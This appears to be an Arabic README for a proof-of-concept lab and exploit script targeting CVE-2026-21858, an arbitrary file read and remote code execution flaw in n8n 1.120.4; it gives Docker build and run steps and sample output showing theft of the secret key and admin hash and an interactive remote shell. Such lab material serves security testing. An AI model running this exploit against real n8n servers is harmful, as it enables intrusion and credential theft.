
بيئة PoC قائمة على Docker ونص استغلال لـ CVE-2026-21858، وهي ثغرة قراءة ملفات عشوائية وتنفيذ أوامر عن بُعد (RCE) في n8n 1.120.4، توفر استخراج الأسرار وصدفة تفاعلية.
بيئة PoC لـ n8n 1.120.4 مع سير عمل Form Trigger ونص استغلال.
Dockerfile — بناء بيئة n8n القابلة للاستغلالrun.bat — تشغيل الحاوية (Windows)workflow.txt — سير عمل n8n (يتضمن Form Trigger)poc.py — نص PoCrequirements.txt — تبعيات PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY، معرّفات المسؤول) من الهدف.n8n-shell>).id) يعيد المخرجات من البيئة الهدف (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
ننشر تحليلاً لـ CVE والبرمجيات الخبيثة مرة واحدة شهرياً. إذا كنت مهتماً، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا.